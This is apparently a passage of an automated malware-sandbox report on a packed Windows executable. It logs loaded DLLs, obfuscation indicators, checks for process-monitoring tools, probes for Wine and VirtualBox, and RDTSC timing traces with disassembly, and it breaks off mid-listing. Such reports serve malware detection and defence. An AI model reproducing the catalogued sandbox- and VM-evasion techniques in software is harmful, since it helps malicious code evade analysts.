Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1884,i,17699298288420818842,9296858339139321116,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1848,i,12859633962272970777,3292351338685912697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.shell.servicehostbuilder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wkscli.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1864192 > 1048576
Source: file.exe Static PE information: Raw size of bioduybg is bigger than: 0x100000 < 0x19dc00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2416083737.0000000007C90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2513647374.0000000005BC2000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.cb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1c9b3a should be: 0x1c9ff1
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: bioduybg
Source: file.exe Static PE information: section name: eaqvzvci
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE886 push edi; mov dword ptr [esp], 2ED07954h 0_2_05BCE820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE886 push edi; mov dword ptr [esp], eax 0_2_05BCEE07
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE886 push edx; mov dword ptr [esp], ebx 0_2_05BCEE13
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE886 push eax; mov dword ptr [esp], 7B0CE75Ah 0_2_05BCF2C5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE886 push ecx; mov dword ptr [esp], esi 0_2_05BCF407
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD0DB4 push 7623F40Eh; mov dword ptr [esp], eax 0_2_05BD0DD3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD0DB4 push edi; mov dword ptr [esp], ecx 0_2_05BD1A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD0DB4 push ecx; mov dword ptr [esp], 648CA65Eh 0_2_05BD1BFF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD05AD push 07C1B0A2h; mov dword ptr [esp], eax 0_2_05BD05B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD0D99 push 1435783Dh; mov dword ptr [esp], ebp 0_2_05BD2997
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD25EC push 3AD5CBC5h; mov dword ptr [esp], eax 0_2_05BD25F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE5CF push eax; mov dword ptr [esp], 7B0CE75Ah 0_2_05BCF2C5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCD5C6 push esi; mov dword ptr [esp], edx 0_2_05BCD5C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD1DC6 push edx; mov dword ptr [esp], esp 0_2_05BD1DC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEED3B push 28EF3B9Fh; mov dword ptr [esp], ecx 0_2_05BEF1FA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEED3B push edi; mov dword ptr [esp], 5FF340CBh 0_2_05BEF214
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEED3B push 283197ACh; mov dword ptr [esp], edi 0_2_05BEF282
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEED3B push ebx; mov dword ptr [esp], edi 0_2_05BEF328
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEED3B push 225CC860h; mov dword ptr [esp], edx 0_2_05BEF347
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEED3B push esi; mov dword ptr [esp], edi 0_2_05BEF3F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BEED3B push ebx; mov dword ptr [esp], edi 0_2_05BEF418
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD0533 push ecx; mov dword ptr [esp], esi 0_2_05BD0AAF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCE52B push 6426AD71h; mov dword ptr [esp], ecx 0_2_05BCF59A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD3D1D push 3217F8F1h; mov dword ptr [esp], edx 0_2_05BD514D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BCCD1E push 506DA227h; mov dword ptr [esp], esi 0_2_05BCCD2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD0515 push eax; mov dword ptr [esp], ebx 0_2_05BD475C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD3516 push edx; mov dword ptr [esp], eax 0_2_05BD3517
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BD3516 push 575B3024h; mov dword ptr [esp], edi 0_2_05BD351F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF8504 push 3FAE0E39h; mov dword ptr [esp], edi 0_2_05BF885C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF8504 push 15BE6B60h; mov dword ptr [esp], ebx 0_2_05BF8917
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05BF8504 push 0F496FB5h; mov dword ptr [esp], edx 0_2_05BF89A9
Source: file.exe Static PE information: section name: entropy: 7.969899728729919
Source: file.exe Static PE information: section name: bioduybg entropy: 7.952935716114438

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88863 second address: E88879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88879 second address: E88883 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA44C7ED4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E877F8 second address: E8780B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEA44C4CABDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8780B second address: E87846 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FEA44C7ED4Fh 0x00000008 jmp 00007FEA44C7ED57h 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FEA44C7ED46h 0x00000019 jp 00007FEA44C7ED46h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E879B6 second address: E879D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FEA44C4CAC3h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E879D4 second address: E879F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEA44C7ED46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jl 00007FEA44C7ED52h 0x00000014 jl 00007FEA44C7ED46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E879F0 second address: E879F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E879F7 second address: E87A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FEA44C7ED46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E87D11 second address: E87D17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E880BB second address: E880C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E880C1 second address: E880CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B36F second address: D0ABCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007FEA44C7ED55h 0x00000011 pop eax 0x00000012 movsx edx, si 0x00000015 push dword ptr [ebp+122D09DDh] 0x0000001b mov dword ptr [ebp+122D1A22h], edx 0x00000021 call dword ptr [ebp+122D1F2Bh] 0x00000027 pushad 0x00000028 add dword ptr [ebp+122D372Ah], edi 0x0000002e xor eax, eax 0x00000030 stc 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jmp 00007FEA44C7ED51h 0x0000003a mov dword ptr [ebp+122D2AC3h], eax 0x00000040 mov dword ptr [ebp+122D372Ah], esi 0x00000046 mov esi, 0000003Ch 0x0000004b pushad 0x0000004c mov dword ptr [ebp+122D344Ch], ebx 0x00000052 mov si, cx 0x00000055 popad 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a clc 0x0000005b lodsw 0x0000005d jp 00007FEA44C7ED47h 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 pushad 0x00000068 jmp 00007FEA44C7ED4Ah 0x0000006d popad 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 stc 0x00000073 push eax 0x00000074 push edi 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FEA44C7ED57h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B3DE second address: E8B3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B3E2 second address: E8B3E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B3E8 second address: E8B421 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA44C4CAB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FEA44C4CAC2h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D25F3h], eax 0x00000018 push A557A0FBh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FEA44C4CABBh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B421 second address: E8B428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B428 second address: E8B4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 5AA85F85h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FEA44C4CAB8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 jmp 00007FEA44C4CABAh 0x0000002d push 00000003h 0x0000002f adc ch, FFFFFFCEh 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FEA44C4CAB8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e push 00000003h 0x00000050 pushad 0x00000051 xor si, F463h 0x00000056 popad 0x00000057 call 00007FEA44C4CAB9h 0x0000005c push eax 0x0000005d jmp 00007FEA44C4CAC9h 0x00000062 pop eax 0x00000063 push eax 0x00000064 jmp 00007FEA44C4CAC2h 0x00000069 mov eax, dword ptr [esp+04h] 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jns 00007FEA44C4CAB6h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B4D3 second address: E8B4E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B4E2 second address: E8B50D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA44C4CAC6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FEA44C4CAB6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B50D second address: E8B511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B511 second address: E8B520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FEA44C4CAB6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B520 second address: E8B54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 mov cl, 18h 0x00000009 lea ebx, dword ptr [ebp+1245427Fh] 0x0000000f push ebx 0x00000010 mov dword ptr [ebp+122D1971h], ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 jnp 00007FEA44C7ED61h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEA44C7ED4Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B54F second address: E8B553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B69F second address: E8B6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FEA44C7ED57h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B6FD second address: E8B765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FEA44C4CABDh 0x0000000b pop esi 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FEA44C4CAB8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FEA44C4CAB8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov cx, di 0x00000049 and dl, FFFFFFD8h 0x0000004c push D6A2C3ECh 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push ebx 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B765 second address: E8B76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B76A second address: E8B80D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 295D3C94h 0x00000010 sub dword ptr [ebp+12453A96h], edx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FEA44C4CAB8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 and ecx, dword ptr [ebp+122D2BABh] 0x00000038 push 00000000h 0x0000003a mov si, 2318h 0x0000003e push 00000003h 0x00000040 mov dword ptr [ebp+122D1A22h], eax 0x00000046 push F980E265h 0x0000004b jnl 00007FEA44C4CABEh 0x00000051 xor dword ptr [esp], 3980E265h 0x00000058 or dword ptr [ebp+122D25F3h], edi 0x0000005e lea ebx, dword ptr [ebp+12454293h] 0x00000064 push 00000000h 0x00000066 push eax 0x00000067 call 00007FEA44C4CAB8h 0x0000006c pop eax 0x0000006d mov dword ptr [esp+04h], eax 0x00000071 add dword ptr [esp+04h], 0000001Ah 0x00000079 inc eax 0x0000007a push eax 0x0000007b ret 0x0000007c pop eax 0x0000007d ret 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 